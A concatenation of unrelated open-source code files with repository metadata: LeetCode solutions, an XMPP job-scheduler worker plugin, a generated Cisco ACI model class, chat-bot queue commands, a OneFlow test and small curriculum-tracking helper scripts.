                     'Febrile paroxysms often occur every other day.')
                ],
                'NCI': [
                    'Malaria resulting from infection by Plasmodium vivax.'
                ]
            }
        }
        # Compare DUI keys, then per-DUI source keys, then each definition
        # list order-insensitively.
        self.assertListEqual(
            sorted(list(dui_definitions.keys())),
            sorted(list(dui_definitions_refr.keys())),
        )
        for k, v in dui_definitions.items():
            self.assertListEqual(
                sorted(list(dui_definitions[k].keys())),
                sorted(list(dui_definitions_refr[k].keys())),
            )
            for kk, vv in dui_definitions[k].items():
                self.assertListEqual(
                    sorted(list(dui_definitions[k][kk])),
                    sorted(list(dui_definitions_refr[k][kk])),
                )
| [
"somada141@gmail.com"
] | somada141@gmail.com |
2ae2bdf8815a466c8b0684f4c105ab6bdd9fe01d | 190d03cf370844548b9e8c89952dfbaec4d0c5c8 | /p622.py | ca9b0956d3c39375b432f18dfc33e341c309628f | [] | no_license | alainlou/leetcode | 446d101a9fd2f9eaa2229252e5909e7df36b4a74 | fe500bcb067be59aa048259e3860e9da6f98344d | refs/heads/master | 2022-10-16T12:20:44.726963 | 2022-09-18T15:29:05 | 2022-09-18T15:29:05 | 178,775,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | class MyCircularQueue:
def __init__(self, k: int):
self.k = k
self.arr = [None]*k
self.front = 0
self.rear = 0
def enQueue(self, value: int) -> bool:
if self.isFull():
return False
else:
if self.isEmpty():
self.arr[self.rear] = value
else:
self.arr[(self.rear + 1)%self.k] = value
self.rear = (self.rear + 1)%self.k
return True
def deQueue(self) -> bool:
if self.isEmpty():
return False
else:
if self.front == self.rear:
self.arr[self.front] = None
else:
self.arr[self.front] = None
self.front = (self.front + 1)%self.k
return True
def Front(self) -> int:
return self.arr[self.front] if not self.isEmpty() else -1
def Rear(self) -> int:
return self.arr[self.rear] if not self.isEmpty() else -1
def isEmpty(self) -> bool:
return self.arr[self.front] is None
def isFull(self) -> bool:
return (self.rear + 1)%self.k == self.front if self.k > 1 else self.arr[self.front] != None
# Your MyCircularQueue object will be instantiated and called as such:
# obj = MyCircularQueue(k)
# param_1 = obj.enQueue(value)
# param_2 = obj.deQueue()
# param_3 = obj.Front()
| [
"az2lou@uwaterloo.ca"
] | az2lou@uwaterloo.ca |
a3157751b8c0617b6c1de79a6d8a459cd0630e40 | 241b3cef3f7146ca332b45a8e3d4005a9e93d024 | /kestrel/plugins/kestrel_tasks.py | 0f84c537dcba24810ff5e77e0a22b82406883da7 | [
"Apache-2.0"
] | permissive | joelimome/Kestrel | c5ec380ec0395df3213e63cd7389f68551350b62 | 199075569e57d72676512a4eaf64e82c21248460 | refs/heads/master | 2021-01-18T06:44:00.105322 | 2010-10-11T14:35:11 | 2010-10-11T14:35:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,690 | py | # Kestrel: An XMPP-based Job Scheduler
# Author: Lance Stout <lancestout@gmail.com>
#
# Credits: Nathan Fritz <fritzy@netflint.net>
#
# Copyright 2010 Lance Stout
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import threading
import signal
import subprocess
import sleekxmpp
from sleekxmpp.plugins import base
from sleekxmpp.xmlstream import JID
from sleekxmpp.xmlstream.handler import Callback
from sleekxmpp.xmlstream.matcher import MatchXPath
from sleekxmpp.xmlstream.stanzabase import ElementBase, ET
from sleekxmpp.xmlstream.stanzabase import registerStanzaPlugin
from sleekxmpp.stanza.iq import Iq
from kestrel.stanza.task import Task
class kestrel_tasks(base.base_plugin):
    """SleekXMPP plugin that executes and cancels Kestrel tasks on a worker.

    Incoming `kestrel:task` IQ stanzas are dispatched as events and run as
    OS subprocesses; at most `max_tasks` tasks run concurrently.
    """

    def plugin_init(self):
        """Register the task IQ handler, events, and internal task state."""
        self.description = "Kestrel Worker"
        self.capabilities = self.config.get('capabilities', [])
        self.xmpp.registerHandler(
            Callback('Kestrel Task',
                MatchXPath('{%s}iq/{%s}task' % (self.xmpp.default_ns,
                                                Task.namespace)),
                self.handle_task))
        registerStanzaPlugin(Iq, Task)
        # Both events run in their own threads so task execution does not
        # block the XMPP processing loop.
        self.xmpp.add_event_handler('kestrel_task', self.start_task, threaded=True)
        self.xmpp.add_event_handler('kestrel_task_cancel', self.cancel_task, threaded=True)
        self.tasks = {}        # (user, resource) -> running subprocess
        self.max_tasks = 1     # concurrent task limit
        self.lock = threading.Lock()  # guards self.tasks

    def post_init(self):
        """Advertise the kestrel:tasks feature and capability node."""
        base.base_plugin.post_init(self)
        self.xmpp['xep_0030'].add_feature('kestrel:tasks')
        self.xmpp['xep_0030'].add_node('kestrel:tasks:capabilities')
        caps = self.xmpp['xep_0030'].nodes['kestrel:tasks:capabilities']
        for cap in self.capabilities:
            caps.addFeature(cap)

    def setMaxTasks(self, num):
        """Set the maximum number of concurrently running tasks."""
        self.max_tasks = num

    def setCapabilities(self, caps):
        """Replace the advertised capability features wholesale."""
        node = self.xmpp['xep_0030'].nodes['kestrel:tasks:capabilities']
        node.setFeatures(caps)

    def handle_task(self, iq):
        """Validate an incoming task IQ and dispatch it as an event."""
        task = iq['kestrel_task']
        logging.info("TASK: Received task: %s" % str(iq))
        # An execute request without a command is malformed.
        if task['action'] == 'execute' and task['command'] == '':
            self._sendError(iq, '406', 'modify', 'not-acceptable')
            return
        # Todo: Check sender for authorization
        events = {'execute': 'kestrel_task',
                  'cancel': 'kestrel_task_cancel'}
        self.xmpp.event(events[task['action']], iq)

    def start_task(self, iq):
        """Run a task subprocess, reporting status via IQ and presence.

        The process is keyed by (sender user, sender resource); the
        resource is also appended to the command line as an argument.
        """
        from_jid = iq['from'].jid
        task = iq['kestrel_task']
        process_id = (iq['from'].user, iq['from'].resource)
        if len(self.tasks) >= self.max_tasks:
            self._sendError(iq, '500', 'cancel', 'resource-constraint')
            return
        if len(self.tasks) == self.max_tasks - 1:
            # Send busy status if we will reach the max number of
            # tasks when we start this one.
            self.xmpp.sendPresence(pshow='dnd', pstatus='Executing Task')
        iq.reply()
        iq['kestrel_task']['status'] = 'executing'
        iq.send()
        self.xmpp.event('kestrel_task_started', iq)
        command = "%s %s" % (task['command'], process_id[1])
        if self._execute(process_id, command):
            iq = self.xmpp.Iq()
            iq['to'] = from_jid
            iq['kestrel_task']['status'] = 'complete'
            iq.send()
        else:
            # NOTE(review): this builds a fresh Iq, sets only 'from', and
            # then _sendError() calls iq.reply() on it — verify the error
            # actually gets addressed back to the scheduler.
            iq = self.xmpp.Iq()
            iq['from'] = from_jid
            self._sendError(iq, '500', 'cancel', 'internal-server-error')
        with self.lock:
            if process_id in self.tasks:
                del self.tasks[process_id]
        self.xmpp.event('kestrel_task_finished', iq)
        if task['cleanup']:
            # Optional cleanup command, run after the task (not tracked).
            command = "%s %s" % (task['cleanup'], process_id[1])
            self._execute(process_id, command, cleanup=True)
        self.xmpp.sendPresence(pstatus='Ready for Task')

    def cancel_task(self, iq):
        """Kill the sender's running task and acknowledge, or error out."""
        process_id = (iq['from'].user, iq['from'].resource)
        if self._cancel(process_id):
            iq.reply().send()
            self.xmpp.event('kestrel_task_cancelled', iq)
        else:
            self._sendError(iq, '404', 'cancel', 'item-not-found')

    def _execute(self, name, command, cleanup=False):
        """Wrapper function to open a subprocess.

        Runs `command` through `sh -c` in its own session (os.setsid) so
        the whole process group can be killed later; blocks until the
        process exits. Returns True on normal completion, False if the
        subprocess could not be started. Only non-cleanup processes are
        tracked in self.tasks (and thus cancellable).
        """
        try:
            task_process = subprocess.Popen(['sh', '-c', "%s" % command],
                                            shell=False,
                                            stdout=subprocess.PIPE,
                                            stderr=subprocess.PIPE,
                                            preexec_fn=os.setsid)
            if not cleanup:
                with self.lock:
                    self.tasks[name] = task_process
                logging.info("TASK: Task started: %s (%s)" % (name, command))
                task_process.wait()
                logging.info("TASK: Task finished: %s (%s)" % (name, command))
            else:
                logging.info("TASK: Cleanup started: %s (%s)" % (name, command))
                task_process.wait()
                logging.info("TASK: Cleanup finished: %s (%s)" % (name, command))
            return True
        except:
            error_type = "cleanup" if cleanup else "task"
            logging.info("TASK: Error starting %s: (%s)" % (error_type, command))
            return False

    def _cancel(self, name):
        """Wrapper function to kill a subprocess.

        Kills the entire process group of the tracked task `name` with
        SIGKILL. Returns False if no such task is tracked.
        """
        if name not in self.tasks:
            logging.info("TASK: Tried cancelling task %s, but task not found." % str(name))
            return False
        task_process = self.tasks[name]
        logging.info("TASK: Cancelling task %s" % str(name))
        try:
            os.killpg(task_process.pid, signal.SIGKILL)
        except:
            pass
        with self.lock:
            if name in self.tasks:
                del self.tasks[name]
        return True

    def _sendError(self, iq, code, etype, condition, text=''):
        """Reply to `iq` with an XMPP error stanza and send it."""
        iq.reply().error()
        iq['error']['code'] = code
        iq['error']['type'] = etype
        iq['error']['condition'] = condition
        iq['error']['text'] = text
        iq.send()
| [
"lancestout@gmail.com"
] | lancestout@gmail.com |
09c98f2636180514e61419c174e02ce50a07fb96 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /oxf7b7vroXvWBJ9Nq_18.py | c91857e0445c9860163566659cc778edc4feb4b3 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py |
import re
def discount(n, txt):
if not len(txt): return n
discounts = sorted(txt.split(", "), key=lambda x: x[-1])
for d in discounts:
if d[-1] == "%":
n -= float(d[:-1])/100*n
else:
n -= float(d)
sol = "{:.2f}".format(n)
return int(sol[:-3]) if sol[-3:] == ".00" else float(re.sub(r"0+$", "", sol))
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
7432e39a052baa01c42ba905cda58827685faba5 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/eqptdiagp/porttestsetbt.py | 3ad8df35a3b2c025a8b87153e3ac3134883bd056 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 6,214 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class PortTestSetBt(Mo):
    """Abstract bootup diagnostic test set for a port (ACI `eqptdiagp` model).

    NOTE(review): this file is auto-generated (see the "do not modify" header);
    the comments here are annotations only -- regenerate rather than hand-edit.
    """
    # Class-level metadata describing this managed object to the cobra runtime.
    meta = ClassMeta("cobra.model.eqptdiagp.PortTestSetBt")
    meta.isAbstract = True
    meta.moClassName = "eqptdiagpPortTestSetBt"
    meta.moClassName = "eqptdiagpPortTestSetBt"  # NOTE(review): duplicated line in the generated output
    meta.rnFormat = ""
    meta.category = MoCategory.REGULAR
    meta.label = "On-Demand Diag Policy Set for the Specified Card Type"
    meta.writeAccessMask = 0x1
    meta.readAccessMask = 0x1
    meta.isDomainable = False
    meta.isReadOnly = False
    meta.isConfigurable = True
    meta.isDeletable = True
    meta.isContextRoot = False
    # Containment / inheritance relationships.
    meta.childClasses.add("cobra.model.fault.Delegate")
    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
    meta.superClasses.add("cobra.model.eqptdiagp.TestSet")
    meta.superClasses.add("cobra.model.pol.Obj")
    meta.superClasses.add("cobra.model.pol.Def")
    meta.superClasses.add("cobra.model.eqptdiagp.TestSetBoot")
    meta.superClasses.add("cobra.model.naming.NamedObject")
    # Concrete subclasses that instantiate this abstract test set.
    meta.concreteSubClasses.add("cobra.model.eqptdiagp.TsBtLeafP")
    meta.concreteSubClasses.add("cobra.model.eqptdiagp.TsBtFabP")
    meta.concreteSubClasses.add("cobra.model.eqptdiagp.TsBtExtChHP")
    meta.concreteSubClasses.add("cobra.model.eqptdiagp.TsBtExtChFP")
    meta.rnPrefixes = [
    ]
    # Property: administrative state of the diagnostic run.
    prop = PropMeta("str", "adminSt", "adminSt", 1942, PropCategory.REGULAR)
    prop.label = "Administrative State"
    prop.isConfig = True
    prop.isAdmin = True
    prop.defaultValue = 1
    prop.defaultValueStr = "start"
    prop._addConstant("start", "start", 1)
    prop._addConstant("stop", "stop", 2)
    prop._addConstant("suspend", "suspend", 3)
    meta.props.add("adminSt", prop)
    # Property: internal child-action bitmask (implicit, not user-set).
    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)
    # Property: free-form description (length/charset constrained).
    prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
    prop.label = "Description"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("descr", prop)
    # Property: distinguished name (assigned at creation, immutable).
    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)
    # Property: bootup test frequency; constant values are milliseconds.
    prop = PropMeta("str", "freq", "freq", 1943, PropCategory.REGULAR)
    prop.label = "Bootup Diag Test Frequency"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "one-shot"
    prop._addConstant("every10mins", "every-10-mins", 600000)
    prop._addConstant("every12hrs", "every-12-hours", 43200000)
    prop._addConstant("every1day", "every-1-day", 86400000)
    prop._addConstant("every1hr", "every-1-hour", 3600000)
    prop._addConstant("every1week", "every-1-week", 604800000)
    prop._addConstant("every2hrs", "every-2-hours", 7200000)
    prop._addConstant("every30mins", "every-30-mins", 1800000)
    prop._addConstant("every4hrs", "every-4-hours", 14400000)
    prop._addConstant("every4weeks", "every-4-weeks", 2419200000)
    prop._addConstant("every5mins", "every-5-mins", 300000)
    prop._addConstant("every8hrs", "every-8-hours", 28800000)
    prop._addConstant("one-shot", "once", 0)
    meta.props.add("freq", prop)
    # Property: object name.
    prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
    prop.label = "Name"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 64)]
    prop.regex = ['[a-zA-Z0-9_.:-]+']
    meta.props.add("name", prop)
    # Property: display alias for the name.
    prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
    prop.label = "Name alias"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 63)]
    prop.regex = ['[a-zA-Z0-9_.-]+']
    meta.props.add("nameAlias", prop)
    # Properties: owner bookkeeping strings.
    prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerKey", prop)
    prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 64)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerTag", prop)
    # Property: relative name (assigned at creation, immutable).
    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)
    # Property: object lifecycle status flags.
    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)
    def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
        """Create the MO under *parentMoOrDn*; this class takes no naming values."""
        namingVals = []
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
a8b518462a18be00cb11ef084cc3170c03798e9e | 9e19b20d5a63d6e7693ad85eba37c8d1d1507192 | /Python/441_Arranging Coins.py | 68b8ab9baf05220ed1854c4304608a9507247475 | [] | no_license | Eddie02582/Leetcode | eacbfdfa0075c16ee7b3eb297c116fe42e7c8550 | b5c25f976866eefec33b96c638a4c5e127319e74 | refs/heads/master | 2022-10-22T20:51:06.739926 | 2022-10-17T07:43:38 | 2022-10-17T07:43:38 | 189,950,613 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | '''
You have a total of n coins that you want to form in a staircase shape, where every k-th row must have exactly k coins.
Given n, find the total number of full staircase rows that can be formed.
n is a non-negative integer and fits within the range of a 32-bit signed integer.
Example 1:
n = 5
The coins can form the following rows:
?
? ?
? ?
Because the 3rd row is incomplete, we return 2.
Example 2:
n = 8
The coins can form the following rows:
?
? ?
? ? ?
? ?
'''
class Solution(object):
    """LeetCode 441 "Arranging Coins"."""

    def arrangeCoins(self, n):
        """Return the number of complete staircase rows *n* coins can fill.

        Row k holds k coins, so we want the largest k with k*(k+1)/2 <= n.
        Solving k**2 + k - 2n = 0 gives k = (sqrt(8n + 1) - 1) / 2; using
        math.isqrt keeps the arithmetic exact for any non-negative integer
        and makes this O(1) instead of the original O(sqrt(n)) counting loop.
        """
        import math  # local import keeps this self-contained snippet dependency-free
        return (math.isqrt(8 * n + 1) - 1) // 2
sol = Solution()
assert sol.arrangeCoins(5) == 2
assert sol.arrangeCoins(8) == 3
assert sol.arrangeCoins(1) == 1
| [
"38853252+Eddie02582@users.noreply.github.com"
] | 38853252+Eddie02582@users.noreply.github.com |
8e862dda517f499add536302544e6aafb9fae6e4 | 7ad0808c8e3f77b1de5e9d3148941dc1404d3432 | /modules/core/system/queue_controller.py | e0f42bae7333d641ea4967a8dc9be090500c4148 | [] | no_license | Budabot/Tyrbot | addadfb6d265d371d5bbef1195a41d53736bf5dc | bf04a5180dac129f56b6d2231ab26070d8b6d2cc | refs/heads/master | 2023-08-04T10:44:29.861252 | 2023-07-26T15:02:54 | 2023-07-26T15:02:54 | 120,727,804 | 27 | 38 | null | 2023-08-15T18:43:24 | 2018-02-08T07:40:12 | Python | UTF-8 | Python | false | false | 1,314 | py | from core.command_param_types import Const, Any
from core.decorators import instance, command
@instance()
class QueueController:
    """Moderator commands for the bot's outgoing packet queue."""

    def inject(self, registry):
        """Resolve the services this controller depends on."""
        self.bot = registry.get_instance("bot")
        self.command_alias_service = registry.get_instance("command_alias_service")
        self.command_service = registry.get_instance("command_service")

    def start(self):
        """Register the shorthand alias for the queue-clear command."""
        self.command_alias_service.add_alias("clearqueue", "queue clear")

    @command(command="queue", params=[Const("clear")], access_level="moderator",
             description="Clear the outgoing message queue")
    def queue_clear_cmd(self, request, _):
        """Drop every packet still waiting on this connection's queue."""
        pending = request.conn.packet_queue
        num_messages = len(pending)
        pending.clear()
        return f"Cleared <highlight>{num_messages}</highlight> messages from the outgoing message queue."

    @command(command="massmsg", params=[Any("command")], access_level="moderator",
             description="Force the reply of the specified command to be sent via non-main bots")
    def massmsg_cmd(self, request, command_str):
        """Execute *command_str*, delivering its reply via the mass-message bots."""
        def relay(msg):
            # Route the reply through the non-main (mass message) connections.
            self.bot.send_mass_message(request.sender.char_id, msg, conn=request.conn)

        self.command_service.process_command(
            command_str, request.channel, request.sender.char_id, relay, request.conn
        )
| [
"email1@jkbff.com"
] | email1@jkbff.com |
093e614f902f69b5827e4236c41809ee21e3d461 | 73a0f661f1423d63e86489d4b2673f0103698aab | /python/oneflow/test/modules/test_global_batch_gather.py | 3653c7d5bb759c2d7bdae6249247d70c87908203 | [
"Apache-2.0"
] | permissive | Oneflow-Inc/oneflow | 4fc3e081e45db0242a465c4330d8bcc8b21ee924 | 0aab78ea24d4b1c784c30c57d33ec69fe5605e4a | refs/heads/master | 2023-08-25T16:58:30.576596 | 2023-08-22T14:15:46 | 2023-08-22T14:15:46 | 81,634,683 | 5,495 | 786 | Apache-2.0 | 2023-09-14T09:44:31 | 2017-02-11T06:09:53 | C++ | UTF-8 | Python | false | false | 2,335 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import numpy as np
import oneflow as flow
import oneflow.unittest
from oneflow.test_utils.automated_test_util import *
from oneflow.test_utils.automated_test_util.util import broadcast
def _test_batch_gather(test_case, ndim, placement, sbp):
    """Check that global (consistent) batch_gather matches the local result.

    Runs flow.batch_gather on a global tensor under *placement*/*sbp* and on
    a plain local copy of the same data, back-propagates a sum through both,
    and asserts the input gradients agree.
    """
    # Random dims, each a multiple of 8 -- presumably so every SBP split
    # divides evenly across devices; TODO confirm.
    dims = [random(1, 3).to(int).value() * 8 for _ in range(ndim)]
    x = random_tensor(ndim, *dims, requires_grad=True)
    # Local single-device copy of the same values, tracked for gradients.
    local_x = flow.tensor(x.pytorch.detach().cpu().numpy(), requires_grad=True)
    global_x = x.oneflow.to_global(placement=placement, sbp=sbp)
    global_x.retain_grad()  # keep .grad so it can be compared below
    # Build an indices tensor over a random prefix of x's dims, with the
    # last indexed axis shortened and values drawn from the valid range.
    indices_ndim = random(1, ndim + 1).to(int).value()
    indices_dims = [dims[i] for i in range(indices_ndim)]
    indices_dims[-1] = random(1, dims[indices_ndim - 1]).to(int).value()
    indices = np.random.choice(dims[indices_ndim - 1], indices_dims)
    indices = broadcast(indices)  # same index values on every rank
    local_indices = flow.tensor(indices)
    # Indices are broadcast across every SBP dimension of the placement.
    global_indices = local_indices.to_global(
        placement=placement, sbp=[flow.sbp.broadcast for _ in range(len(sbp))]
    )
    global_out = flow.batch_gather(global_x, global_indices)
    global_out.sum().backward()
    local_out = flow.batch_gather(local_x, local_indices)
    local_out.sum().backward()
    # Gradients of the global and local runs must agree within tolerance.
    test_case.assertTrue(
        np.allclose(
            global_x.grad.detach().cpu().numpy(),
            local_x.grad.detach().cpu().numpy(),
            atol=1e-5,
            rtol=1e-5,
        )
    )
class TestBatchGather(flow.unittest.TestCase):
    """Exercise batch_gather under every placement/SBP combination."""

    @globaltest
    def test_batch_gather(test_case):
        tensor_ndim = 2
        for placement in all_placement():
            for sbp in all_sbp(placement, max_dim=tensor_ndim):
                _test_batch_gather(test_case, tensor_ndim, placement, sbp)
if __name__ == "__main__":
    # Run under unittest's CLI when executed directly.
    unittest.main()
| [
"noreply@github.com"
] | Oneflow-Inc.noreply@github.com |
7411091b34332232c549ad28678e225515310812 | 7d90d2ce27c6ee0af74391b09909edbd45fdc2f0 | /renix_py_api/api_gen/ResultView_Autogen.py | 016622ef5e523d60fed961c68f0489c4b254c5cc | [] | no_license | gaoxingyu-hub/54testframework-master-e284 | d7ea0d4a715b65c8652430e963a86b9522a7237a | 57dd2197e7d91b8ad8fb2bd0e3503f10afa08544 | refs/heads/master | 2023-04-30T05:50:41.542402 | 2021-05-28T09:19:37 | 2021-05-28T09:19:37 | 309,922,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,180 | py | """
Auto-generated File
Create Time: 2019-12-27 02:33:25
"""
from .ROMEnum_Autogen import *
from renix_py_api.renix_common_api import *
from renix_py_api import rom_manager
from .ROMObject_Autogen import ROMObject
@rom_manager.rom
class ResultView(ROMObject):
    """Auto-generated ROM wrapper for a renix result view.

    NOTE(review): generated file (see header); prefer regenerating over
    hand-editing. Property writes are pushed to the renix server via edit().
    """
    def __init__(self, ViewName=None, DataClassName=None, **kwargs):
        self._ViewName = ViewName  # Result View Name
        self._DataClassName = DataClassName  # Result class name
        properties = kwargs.copy()
        # Only forward explicitly supplied values to the server.
        if ViewName is not None:
            properties['ViewName'] = ViewName
        if DataClassName is not None:
            properties['DataClassName'] = DataClassName
        # call base class function, and it will send message to renix server to create a class.
        super(ResultView, self).__init__(**properties)
    def delete(self):
        """
        call to delete itself
        """
        return self._finalize()
    def edit(self, ViewName=None, DataClassName=None, **kwargs):
        """Update the local cache and push the changed properties to the server."""
        properties = kwargs.copy()
        if ViewName is not None:
            self._ViewName = ViewName
            properties['ViewName'] = ViewName
        if DataClassName is not None:
            self._DataClassName = DataClassName
            properties['DataClassName'] = DataClassName
        super(ResultView, self).edit(**properties)
    @property
    def ViewName(self):
        """
        get the value of property _ViewName
        """
        # force_auto_sync presumably refreshes the cached value from the
        # server before returning it -- confirm in ROMObject.get().
        if self.force_auto_sync:
            self.get('ViewName')
        return self._ViewName
    @property
    def DataClassName(self):
        """
        get the value of property _DataClassName
        """
        if self.force_auto_sync:
            self.get('DataClassName')
        return self._DataClassName
    @ViewName.setter
    def ViewName(self, value):
        self._ViewName = value
        self.edit(ViewName=value)
    @DataClassName.setter
    def DataClassName(self, value):
        self._DataClassName = value
        self.edit(DataClassName=value)
    def _set_viewname_with_str(self, value):
        # Internal setter that only updates the cache (no edit()/server call).
        self._ViewName = value
    def _set_dataclassname_with_str(self, value):
        self._DataClassName = value
| [
"gaoxingyu@example.com"
] | gaoxingyu@example.com |
459c9001444fdc3031c5f9eeb2aa1cb81d654248 | 8ec653d0a30a732b838dc32b83fa9c12a47e3fcd | /backend/curriculum_tracking/management/project_wrangle_helpers.py | eec3c126736d55edd30a256c5f528b30be4e554a | [] | no_license | Rokhuda/Tilde | 6cc853629dbdc781bb454908a75a4f87a6dbf2bd | 79fd6911dda531b1893d9c989bef586151b45b15 | refs/heads/develop | 2023-01-06T08:40:58.143424 | 2020-10-06T10:28:45 | 2020-10-06T10:28:45 | 301,546,454 | 0 | 0 | null | 2020-10-06T10:28:46 | 2020-10-05T21:39:52 | null | UTF-8 | Python | false | false | 12,942 | py | """ These helper functions were leveraged heavily in preparing the recruit projects for flavoursome cards.
There were a lot of different messes to be cleaned up
"""
from taggit.models import Tag
import csv
from core.models import Cohort, RecruitCohort, User, UserGroup
from curriculum_tracking.models import (
RecruitProject,
ContentItem,
AgileCard,
CurriculumContentRequirement,
)
javascript = Tag.objects.get_or_create(name="javascript")[0]
python = Tag.objects.get_or_create(name="python")[0]
java = Tag.objects.get_or_create(name="java")[0]
kotlin = Tag.objects.get_or_create(name="kotlin")[0]
swift = Tag.objects.get_or_create(name="swift")[0]
typescript = Tag.objects.get_or_create(name="typescript")[0]
none = Tag.objects.get_or_create(name="none")[0]
def get_project_info(content_item_id, user_id):
user = User.objects.get(pk=user_id)
projects = RecruitProject.objects.filter(
content_item_id=content_item_id, recruit_users__in=[user]
)
groups = UserGroup.objects.filter(users__in=[user])
cohorts = [o.cohort for o in RecruitCohort.objects.filter(user=user)]
content_item = ContentItem.objects.get(pk=content_item_id)
print(f"user = {user}")
print(f"groups = {groups}")
print(f"cohorts = {cohorts}")
print(f"content_item = {content_item}")
print(f"{projects.count()} matching projects:")
for project in projects:
print(f"Project: id={project.id} {project}")
print(f"\trepo: {project.repository.ssh_url}")
try:
print(f"\tcard: id={project.agile_card.id} {project.agile_card}")
except AgileCard.DoesNotExist:
print("\tno card")
print()
def export_projects_without_flavours():
with open("gitignore/projects_needing_flavours.csv", "w") as f:
writer = csv.writer(f)
for project in RecruitProject.objects.all():
if project.flavours.count() == 0:
all_groups = []
for user in project.recruit_users.all():
all_groups.extend(
[
f"group {o.id} {o.name}"
for o in UserGroup.objects.filter(users__in=[user])
]
)
all_groups.extend(
[
f"c {o.id} {o.cohort.label}"
for o in RecruitCohort.objects.filter(user=user)
]
)
writer.writerow(
[
project.id,
str(project),
set(all_groups),
project.repository.ssh_url if project.repository else "",
[o.name for o in project.content_item.available_flavours.all()],
]
)
def assign_flavours_to_cohort(cohort_id, default_flavour):
cohort = Cohort.objects.get(pk=cohort_id)
users = [o.user for o in RecruitCohort.objects.filter(cohort=cohort)]
for user in users:
assign_flavours_to_user(user, default_flavour)
def assign_flavours_to_user(user, default_flavour):
for project in RecruitProject.objects.filter(recruit_users__in=[user]):
if project.flavours.count() > 0:
